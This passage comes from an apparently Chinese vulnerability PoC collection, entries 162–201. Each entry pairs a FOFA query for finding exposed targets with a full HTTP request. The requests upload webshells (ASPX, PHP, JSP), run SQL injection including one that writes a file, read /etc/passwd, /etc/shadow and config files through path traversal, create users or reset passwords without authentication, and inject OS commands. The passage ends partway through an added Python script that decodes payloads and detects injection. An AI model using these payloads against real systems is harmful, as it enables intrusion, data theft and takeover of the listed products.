<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 (Lanwon clinical viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 (Esafenet electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The /js/../ segment is a filter bypass: the request path looks like a static resource to the access filter, while the container normalises it to /CDGServer3/NavigationAjax before dispatch.

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The saved file's extension comes from the name query parameter (name=.ashx); the request body is the raw ASP.NET handler source that the server then compiles.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科云鉴安全管理系统 (Hillstone Networks 云鉴 security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Fetch a CSRF token (the same PHPSESSID value is reused in the next request):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Submit the token; the param value is evaluated as a Python expression, so os.system() writes a marker file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the marker file back to confirm execution:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the endpoint is reachable and the target is likely vulnerable. The filename carries a path traversal that drops the JSP directly into the deployed fe.war directory.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 (Volans internet behavior management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field is concatenated into a shell command; the leading and trailing semicolons terminate the intended command and run uname -a in its place.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request carries no session or credential; xgh (学工号, the student/staff ID) selects the account whose password is set to newPass.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 (customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
The ;.js path parameter is dropped by the servlet container when mapping the request but makes the URL look like a static resource to a suffix-based access filter.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 (Aliyun Drive) aliyundrive-webdav LuCI command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value URL-decodes to `ls />/www/aaa.txt`, a backtick command substitution. The request is sent with a LuCI sysauth session cookie, so this is post-authentication.

199. Cockpit assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Request the login page to obtain the CSRF token (the token and cookie values below are from the original author's run):
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with the token from step 1 (credentials admin/admin in this PoC) to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

The TableName value decodes to DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, a stacked time-based probe against SQL Server.

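Most of the entries above deliver SQL or command injection through a single URL-encoded or hex-encoded parameter, and a defender reviewing access logs or a WAF capture first has to see the payload in clear. The script below is an added example written for this page; it is not code from the original article or from any of the vendors it lists. It decodes a raw request, expands MySQL unhex('...') and CHAR(...) literals, and tags the injection primitives the PoCs rely on (time-based SLEEP / WAITFOR DELAY / RANDOMBLOB, INTO OUTFILE, UNION SELECT, shell metacharacters). The sample requests inside it are constructed from entries 185, 186, 195 and 198; the indicator regexes and their labels are this example's own heuristics, not vendor signatures.

```python
"""Triage helper for the injection PoCs listed above (added example).

Decodes a raw HTTP request the way a defender triaging logs would: URL-decodes
query and form parameters, expands MySQL unhex('...') and CHAR(...) literals so
hidden webshells become readable, and labels the injection primitives used by
the PoCs above. Samples are constructed from entries 185, 186, 195 and 198;
the indicator patterns are heuristics of this example, not vendor signatures.
"""
import re
from urllib.parse import parse_qsl

UNHEX_RE = re.compile(r"unhex\(\s*'([0-9a-fA-F]+)'\s*\)", re.I)
CHAR_RE = re.compile(r"\bCHAR\(([0-9,\s]+)\)", re.I)

# Injection primitives used by the PoCs above; the labels are this example's.
INDICATORS = {
    "sqli_time_based": re.compile(
        r"\b(sleep\s*\(|waitfor\s+delay\b|randomblob\s*\()", re.I),
    "sqli_file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "sqli_union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "cmd_injection": re.compile(
        r"(`[^`]+`|\$\([^)]*\)|os\.system\s*\(|;\s*(uname|id|ls|cat|whoami|echo)\b)",
        re.I),
}


def expand_literals(text: str) -> str:
    """Replace unhex('3c3f...') and CHAR(65,66,...) with the text they encode,
    so a webshell hidden behind hex or character codes shows up in clear."""
    def _unhex(m):
        return bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")

    def _char(m):
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        return "'" + "".join(chr(c) for c in codes) + "'"

    return CHAR_RE.sub(_char, UNHEX_RE.sub(_unhex, text))


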